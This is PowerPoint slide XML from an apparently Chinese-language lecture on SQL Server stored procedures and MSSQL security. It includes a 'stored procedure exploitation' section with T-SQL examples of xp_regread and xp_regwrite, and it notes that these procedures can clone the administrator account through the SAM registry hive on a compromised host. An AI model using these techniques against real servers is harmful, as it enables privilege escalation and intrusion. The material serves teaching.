              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>存储过程的缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>数据库移植不方便，存储过程依赖于数据库管理系统，存储过程中封装的操作代码不能直接移植到其他的数据库管理系统中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>不支持面向对象的设计，无法采用面向对象的方式将逻辑业务进行封装装，甚至形成通用的可支持服务的业务逻辑框架。代码可读性差、不易维护。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>不支持集群。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>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存储过程概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2888970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853208"/>
            <a:ext cx="10972800" cy="4384104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>中的存储过程是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>T-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>代码编写的代码段。在存储过程中可以声明变量、执行条件判断语句等其他编程功能。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>中有多种类型的存储过程，总的可以分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>类：系统存储过程、用户存储过程和扩展存储过程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>系统存储过程是由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>系统自身提供的存储过程，可以作为命令执行各种操作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>自定义存储过程即用户使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>T-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>语句编写的、为了实现某一特定业务需求，在用户数据库中编写的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>T-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>语句集合，用户存储过程可以接受输入参数、向客户端返回结果和信息、返回输出参数等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>扩展存储过程是以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>环境外执行的动态链接库（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>文件）来实现的，可以加载到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL Server 2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>实例运行的地址空间中执行，扩展存储过程可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>扩展存储过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>完成编程。扩展存储过程以前缀“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>_”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>来标识，对于用户来说，扩展存储过程和普通存储过程一样，可以用相同的方式来执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>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存储过程分类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2002283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853208"/>
            <a:ext cx="10972800" cy="4384104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_regread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>这个扩展存储过程可以读取注册表指定的键里指定的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，使用方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>得到机器名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DECLARE @test varchar(50)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_regread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>rootkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>='HKEY_LOCAL_MACHINE',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>@key='system\controlset001\control\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>computername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>computername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>value_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>computername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>@value=@test OUTPUT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SELECT @test</a:t>
            </a:r>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存储过程利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1579469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853208"/>
            <a:ext cx="10972800" cy="4384104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>这个扩展存储过程可以写入注册表指定的键里指定的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，使用方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE\SOFTWARE\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>aaaValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>bbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>rootkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>='HKEY_LOCAL_MACHINE',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>@key='SOFTWARE\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>value_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>aaaValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>@type='REG_SZ',</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>@value='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>bbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>　　如果被入侵的计算机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>用户可以浏览注册表中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE\SAM\SAM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>信息，那使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_regread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>这两个存储过程可以实现克隆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>用户，得到管理员权限。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_regdeletekey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>xp_regdeletevalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>也会对系统带来安全隐患</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>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存储过程利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333987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en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的安全性就是用来保护服务器和存储在服务器中的数据，它的安全性可以决定哪些用户可以登录到服务器，登录到服务器的用户可以对哪些数据库队形执行操作或管理任务等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>从安全体系结构顺序上可以分为认证和授权两个部分，安全机制可以分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>个层级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>客户机安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>网络传输的安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>实例级别的安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库级别的安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>对象级别的安全机制</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安全性概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4010708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853208"/>
            <a:ext cx="10972800" cy="4384104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>OLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>相关的一系列存储过程，这系列的存储过程有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sp_OACreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sp_OADestroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sp_OAGetErrorInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sp_OAGetProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sp_OAMethod</a:t>
            </a:r>
            <a:r>
